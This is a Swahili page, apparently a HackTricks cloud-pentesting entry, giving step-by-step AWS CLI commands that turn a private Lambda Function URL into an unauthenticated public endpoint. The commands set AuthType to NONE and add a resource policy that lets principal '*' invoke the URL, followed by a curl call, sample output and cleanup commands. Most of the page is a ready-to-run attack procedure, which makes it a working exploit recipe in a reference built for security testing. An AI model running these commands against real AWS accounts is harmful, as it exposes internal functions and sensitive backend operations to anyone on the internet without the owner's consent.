AWS - Lambda Function URL Kufichuliwa kwa Umma (AuthType NONE + Public Invoke Policy)

Reading time: 3 minutes

Badilisha Lambda Function URL ya kibinafsi kuwa endpoint ya umma isiyothibitishwa kwa kubadilisha Function URL AuthType kuwa NONE na kuambatanisha sera ya msingi wa rasilimali inayompa lambda:InvokeFunctionUrl kila mtu. Hii inawezesha uitumaji bila kujulikana wa function za ndani na inaweza kufichua operesheni za backend zenye siri.

Kutumia vibaya

• Vigezo vinavyotakiwa: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
• Mkoa: us-east-1

Hatua

1. Hakikisha funksheni ina Function URL (kwa kawaida ni AWS_IAM):

aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

2. Badilisha URL kuwa ya umma (AuthType NONE):

aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE

3. Ongeza tamko la sera la msingi wa rasilimali ili kuruhusu wadau wasiothibitishwa:

aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE

4. Pata URL na uitumie bila cheti za uthibitisho:

URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"

Athari

• Funksheni ya Lambda inakuwa inaweza kufikiwa mtu yeyote mtandaoni bila uthibitisho.

Mfano wa pato (200 bila uthibitisho)

HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}

Usafishaji

aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true